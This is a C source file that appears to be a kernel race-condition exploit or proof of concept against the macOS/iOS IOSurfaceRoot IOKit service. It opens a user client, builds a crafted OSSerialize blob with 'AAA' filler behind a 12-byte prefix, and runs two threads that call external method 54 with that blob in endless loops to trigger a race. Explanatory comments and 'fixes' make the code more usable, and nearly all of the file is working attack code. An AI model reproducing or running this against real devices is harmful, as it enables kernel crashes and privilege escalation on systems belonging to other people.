#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>
#include <IOKit/IOKitLib.h>
/*
 * Tag words of the OSSerialize binary format; main() assembles its payload
 * from these.  Each 32-bit word carries a type in bits 24..30
 * (kOSSerializeTypeMask), a value in the low 24 bits (kOSSerializeDataMask)
 * and an end-of-collection flag in bit 31 (kOSSerializeEndCollecton, spelling
 * kept as written).  main() ORs small counts/lengths into the low bits
 * (Array | End | 1, Symbol | End | 4), so those bits apparently hold an
 * element count or byte length -- not stated anywhere in this file.
 */
enum
{
kOSSerializeDictionary = 0x01000000U,
kOSSerializeArray = 0x02000000U,
kOSSerializeSet = 0x03000000U,
kOSSerializeNumber = 0x04000000U,
kOSSerializeSymbol = 0x08000000U,
kOSSerializeString = 0x09000000U,
kOSSerializeData = 0x0a000000U,
kOSSerializeBoolean = 0x0b000000U,
kOSSerializeObject = 0x0c000000U,
kOSSerializeTypeMask = 0x7F000000U,   /* bits 24..30 */
kOSSerializeDataMask = 0x00FFFFFFU,   /* low 24 bits */
kOSSerializeEndCollecton = 0x80000000U, /* bit 31 */
kOSSerializeBinarySignature = 0x000000d3, /* first word of a blob; only constant without a U suffix */
};
/*
 * State shared between main() and the two worker threads.  main() writes all
 * three before it calls pthread_create and nothing writes them afterwards, so
 * the workers only read them; there is no lock, which relies on pthread_create
 * ordering those earlier writes before the new thread starts.
 */
io_connect_t glob_conn = 0; /* user client opened in main() */
char *inStr = 0;            /* heap buffer: 12-byte prefix + serialized words; allocated in main(), never freed */
size_t len = 0;             /* byte length of inStr */
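/*
 * Worker thread: repeatedly invokes external method selector 54 on the user
 * client in glob_conn, passing inStr/len as the input structure and
 * requesting no output.  The loop never terminates, so the thread lives until
 * the process exits; the return value of each call is deliberately ignored.
 *
 * Declared with the pthread start-routine prototype (void *(*)(void *)): the
 * original empty parameter list was unprototyped and would become
 * incompatible with pthread_create under C23, where "()" means "(void)".
 *
 * arg: unused.
 * Returns NULL only when the globals have not been set up by main().
 */
void *race1(void *arg) {
    (void)arg;
    if (!inStr || !len || !glob_conn) {
        printf("Malformed req!\n");
        return NULL;
    }
    for (;;) {
        (void)IOConnectCallMethod(glob_conn, 54, 0, 0, inStr, len, 0, 0, 0, 0);
    }
}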
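/*
 * Second worker thread; identical to race1() so that two threads issue the
 * same external method 54 call concurrently with the same inStr/len buffer.
 * The loop never terminates and the per-call result is deliberately ignored.
 *
 * Declared with the pthread start-routine prototype (void *(*)(void *)); the
 * original empty parameter list was unprototyped and would become
 * incompatible with pthread_create under C23.
 *
 * arg: unused.
 * Returns NULL only when the globals have not been set up by main().
 */
void *race2(void *arg) {
    (void)arg;
    if (!inStr || !len || !glob_conn) {
        printf("Malformed req!\n");
        return NULL;
    }
    for (;;) {
        (void)IOConnectCallMethod(glob_conn, 54, 0, 0, inStr, len, 0, 0, 0, 0);
    }
}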
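/*
 * Entry point.  Looks up the IOSurfaceRoot service, opens a user client on
 * it, builds a short OSSerialize binary blob behind a 12-byte prefix, and
 * starts two threads (race1, race2) that both invoke external method 54 with
 * that blob in an endless loop.  main() then joins the threads, so in practice
 * it does not return once they are running.
 *
 * Returns 2 when the service is not present, 3 when the user client cannot
 * be opened, 1 when allocation or thread creation fails.
 *
 * Fixes over the original: malloc/memcpy are now declared (stdlib.h,
 * string.h), the allocation and both pthread_create calls are checked, the
 * 12-byte prefix is zeroed instead of left indeterminate, and the service
 * handle is released.
 */
int main(void) {
    io_service_t surface = IOServiceGetMatchingService(kIOMainPortDefault,
                                                      IOServiceMatching("IOSurfaceRoot"));
    if (!surface) {
        printf("IOKit obj doesn't exist???\n");
        return 2;
    }

    io_connect_t conn = 0;
    kern_return_t kr = IOServiceOpen(surface, mach_task_self(), 0, &conn);
    /* The service handle is not needed once IOServiceOpen has run, whatever its result. */
    IOObjectRelease(surface);
    if (kr != KERN_SUCCESS) {
        printf("Failed to open userclient!\n");
        return 3;
    }
    glob_conn = conn;
    printf("Opened userclient!\n");

    /* Serialized words built from the enum tags: the signature, a one-element
       array (end-of-collection set), and a symbol tag with 4 in its low bits
       followed by one data word. */
    uint32_t dict[] = {
        kOSSerializeBinarySignature,
        kOSSerializeArray | kOSSerializeEndCollecton | 1,
        kOSSerializeSymbol | 4 | kOSSerializeEndCollecton,
        0x00414141
    };

    /* The words are sent behind a 12-byte prefix whose meaning this file does
       not state.  The original malloc'ed the buffer and never wrote those 12
       bytes; calloc zeroes them so every call sends the same input. */
    size_t total = sizeof dict + 12;
    char *buf = calloc(1, total);
    if (!buf) {
        printf("Out of memory!\n");
        IOServiceClose(conn);
        return 1;
    }
    memcpy(buf + 12, dict, sizeof dict);
    inStr = buf;
    len = total;

    /* The globals above must be fully written before the first pthread_create:
       the workers read them without any lock. */
    pthread_t th1;
    pthread_t th2;
    if (pthread_create(&th1, NULL, race1, NULL) != 0) {
        printf("Failed to start thread 1!\n");
        free(buf);
        IOServiceClose(conn);
        return 1;
    }
    if (pthread_create(&th2, NULL, race2, NULL) != 0) {
        /* th1 is already in its endless loop and has no stop signal; returning
           from main ends the whole process, including that thread. */
        printf("Failed to start thread 2!\n");
        return 1;
    }
    pthread_join(th1, NULL);
    pthread_join(th2, NULL);
    return 0;
}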